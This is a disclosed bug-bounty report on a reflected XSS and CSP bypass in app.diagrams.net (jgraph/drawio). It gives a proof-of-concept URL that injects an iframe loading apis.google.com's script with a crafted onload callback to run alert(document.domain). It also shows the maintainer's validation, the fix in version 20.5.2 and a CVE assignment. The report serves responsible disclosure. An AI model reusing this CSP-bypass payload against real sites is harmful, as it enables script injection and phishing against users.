XSS and CSP bypass in app.diagrams.net in jgraph/drawio

Valid

Reported on

Nov 4th 2022

Description

The application reflects an input from the url without sanitizing it. With a csp bypass from apis.google.com its possible to execute javascript code.

Proof of Concept

https://app.diagrams.net/?ui=min&p=tickets#_TICKETS%7B%22ticketsConfig%22%3A%7B%22deskApiKey%22%3A%22teste%22%2C%22deskDomain%22%3A%22teste\%22%3E%3Ciframe%20srcdoc=%27%3Cscript%20src=https://apis.google.com/js/api.js?onload=DrawGapiClientCallbackxyz%26%23x22;-alert(document.domain)-%26%23x22;%3E%3C/script%3E%27%3Easdfasdf%22%7D%7D

Impact

XSS, Phishing

Occurrences

tickets.js L83

A fix would be use mxUtils.htmlEntities(var), as it used in other places

We are processing your report and will contact the jgraph/drawio team within 24 hours. a year ago

David Benson validated this vulnerability a year ago

Another good catch

Joao Vitor Maia has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

David Benson marked this as fixed in 20.5.2 with commit d37894 a year ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

tickets.js#L83 has been validated

David Benson published this vulnerability a year ago

to join this conversation